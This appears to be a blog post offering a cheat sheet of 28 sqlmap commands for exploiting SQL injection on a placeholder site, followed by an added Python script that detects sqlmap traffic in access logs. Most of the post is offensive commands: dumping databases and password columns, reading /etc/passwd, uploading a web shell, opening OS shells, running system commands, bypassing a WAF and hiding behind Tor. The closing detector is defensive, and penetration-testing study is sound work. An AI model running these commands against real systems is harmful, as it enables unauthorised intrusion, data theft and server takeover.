October 22, 2021

TECH HYME

A Blog For Tech Enthusiasts

Top SQLMAP Commands For Exploitation of SQL Injection


Structured Query Language, better known as SQL, is the underlying common programming language understood by most database management systems. It gives applications a common way to access the data in a database using a common set of commands the database can understand.

Attackers exploit these databases by making them output information that they should not be displaying. Sometimes this is as simple as the attacker asking for privileged information from the database management system. Other times, it is taking advantage of poor configurations by database administrators.

Attackers may also take advantage of a vulnerability in the database management system that allows the attacker to view or write privileged commands to and from the database.

Sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. It comes with a detection engine and a broad range of penetration testing (PT) features, from DB fingerprinting to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

The basic syntax to use Sqlmap is:

sqlmap -u URL --function

Below is a list of the most useful sqlmap commands, which you can use against your vulnerable target:

1. GET Request

sqlmap -u http://example.com/page.php?id=1 --dbs

2. From File

sqlmap -r request.txt

3. Testing with a Pattern of URLs

sqlmap -u http://example.com/page/*/view --dbs

4. POST Request

sqlmap -u http://example.com/login.php --data "username=admin&pass=admin&submit=submit" -p username

5. Using Cookies

sqlmap -u http://example.com/index.php?id=1 --cookie="PHPSESSID=45634b63g643f563456g4356g"

6. Extract Databases (DB Enumeration)

sqlmap -u http://example.com/page.php?id=1 --dbs

7. Identify Current DB

sqlmap -u http://example.com/page.php?id=1 --current-db

8. Extract Tables

sqlmap -u http://example.com/page.php?id=1 -D database --tables

9. Extract Columns

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns

10. Dumping Data

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C column1,column2 --dump

11. Multithreading

sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5

12. Null-Connection

sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection

13. HTTP Persistent Connection

sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive

14. Output prediction

sqlmap -u http://example.com/page.php?id=1 -D database -T user -C users,password --dump --predict-output

15. Checking privileges

sqlmap -u http://example.com/page.php?id=1 --privileges

16. Reading Files from the server

sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/passwd

17. Uploading Files/Shell

sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php

18. SQL Shell

sqlmap -u http://example.com/page.php?id=1 --sql-shell

19. OS shell

sqlmap -u http://example.com/page.php?id=1 --os-shell

20. OS Command Execution without Shell Upload

sqlmap -u http://example.com/page.php?id=1 --os-cmd "uname -a"

21. Using Proxy

sqlmap --proxy="http://127.0.0.1:8080" -u http://example.com/page.php?id=1 --dbs

22. Using Proxy with Credentials

sqlmap --proxy="http://127.0.0.1:8080" --proxy-cred=username:password -u http://example.com/page.php?id=1

23. Crawling

sqlmap -u http://example.com/ --crawl=1

24. Exploitation in Verbose Mode

sqlmap -u http://example.com/page.php?id=1 -v 3

25. Bypassing WAF (Web Application Firewall)

sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask

26. Scanning Key Based Authentication Page

sqlmap -u http://example.com/page.php?id=1 --auth-file=

27. To use default TOR Network

sqlmap -u http://example.com/page.php?id=1 --tor

28. Scanning with High Risk and Level

sqlmap -u http://example.com/page.php?id=1 --level=5 --risk=3
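
From the defender's side, requests generated by the commands above leave recognizable traces in web server access logs. The following is an added example, not part of the original post: it scans constructed combined-format log lines for sqlmap's default User-Agent and a few illustrative injection signatures. The log lines, the signature set and the function name `scan` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines in "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Oct/2021:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [22/Oct/2021:10:00:02 +0000] "GET /page.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.5.10#stable (http://sqlmap.org)"
203.0.113.9 - - [22/Oct/2021:10:00:03 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 498 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [22/Oct/2021:10:00:04 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 - - [22/Oct/2021:10:00:05 +0000] "GET /news.php?title=student+union+selects+board HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# Captures client IP, request target and User-Agent from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Illustrative signatures only (assumption), not a complete rule set.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),
    "boolean-test": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
}

def scan(log_text):
    """Return {client_ip: sorted list of reasons} for suspicious requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, target, agent = m.groups()
        # sqlmap identifies itself in the User-Agent by default.
        if "sqlmap/" in agent.lower():
            hits[ip].add("sqlmap-user-agent")
        # Match on the decoded query string, since payloads arrive URL-encoded.
        query = unquote_plus(target.partition("?")[2])
        for name, pattern in SIGNATURES.items():
            if pattern.search(query):
                hits[ip].add(name)
    return {ip: sorted(reasons) for ip, reasons in hits.items()}

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The User-Agent check only catches default configurations, so the query-string signatures carry the detection when that header has been changed. The word boundaries keep the benign "union selects" headline in the last sample line from being flagged.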
